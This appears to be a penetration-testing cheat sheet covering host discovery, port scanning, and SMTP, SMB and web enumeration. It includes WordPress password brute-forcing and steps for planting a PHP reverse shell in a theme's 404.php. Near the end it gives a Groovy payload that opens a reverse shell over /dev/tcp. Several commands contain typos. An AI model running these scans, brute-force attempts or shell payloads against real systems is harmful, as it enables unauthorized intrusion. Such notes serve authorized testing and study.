sudo nmap --top-ports 50 <RANGE> --open -Pn -oA nmap_tcp_top50_hostdicovery
cat nmap_tcp_top50_hostdicovery | grep open | awk -f '{print $2}' | sort u > hosts.txt
sudo nmap -sn <RANGE> -oA nmap_tcp_pingsweep
sudo netdiscover -r <RANGE>
sudo netdisover -i <INTERFACE>
arp-scan -l
21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy
sudo nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET>
sudo nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET>
-Pn
No ping #Use if host says down but you know its up)-sn
No port scan #Use for ping sweep
If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.
autorecon -vv <IP>
nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET>
nc -nv <IP> 25
VRFY root
VRFY idontexist
nmap -p25 --script smtp-enum-users <IP>
nmap -p25 --script smtp-commands <IP>
nmap -p25 --script *smtp* <IP>
sendEmail -t <VICTIM MAIL> -f <SENDER MAIL> -s <MAILSERVER IP> -u <TITLE OF MAIL> -a <ATTACHED FILE PATH>
sudo python3 smbver.py <IP> <PORT>
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>
enum4linux <IP>
crackmapexec smb -u '' -p '' --shares
- use
-d <DOMAIN>
if the account is a domain account
crackmapexec smb -u '<USERNAME>' -p '<PASSWORD>' -d .
- If username and password fill in the
""%""
part
smbclient -L <IP> -U ""%""
- If username and password fill in the
""%""
part
smbclient //<IP>/<SHARE> -U ""%""
get <FILE NAME>-
smbget -R smb://<IP>/<SHARE>
nbtscan <IP>
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>
ssh <IP>
ssh <IP> -oKexAlgorithms=+<alg from error>
ssh <IP> -oKexAlgorithms=+<alg from error> -c <cipher from error>
- Check the file extensions in URL’s to see what the application is running (.net .aspx .php etc)
- Inspect page content
- Check Firefox debugger for outdated javascript libraries
- Look for /robots.txt and /sitemap.xml
- If the webserver is running https, check the certificate for a url/hostname and add it to
/etc/hosts
curl <WEBPAGE>
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt
Collect screenshot from list of ips
for ip in $(cat <IP FILE>); do cutycapt --url=$ip --out=$ip.png;done
#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> w
eb.html
echo "</BODY></HTML>" >> web.html
./EyeWitness -f urls.txt --web
nikto -host <URL> -output nikto-URL.txt
-R
to disable recursive scanning-p
set up a proxy IP:PORT-X
Append each word with this extensions.
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt
dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt
- use the
-b
flag to blacklist status codes. - Use the
-x
flag to add file extensions.
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> gobuster-<URL>.txt
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> gobuster-<URL>.txt
wpscan -url <URL>
wpscan –url <URL> -–enumerate u
wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
- Login --> Appearance --> Theme editor --> 404.php
- gedit /usr/share/webshells/php/php-reverse-shell.php
- Paste in 404.php
- Start listener and go to an unexisting page in the browser
- After login go to /script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
curl -v -X OPTIONS http://website/directory
#HTTP options such as PUT, Delete are bad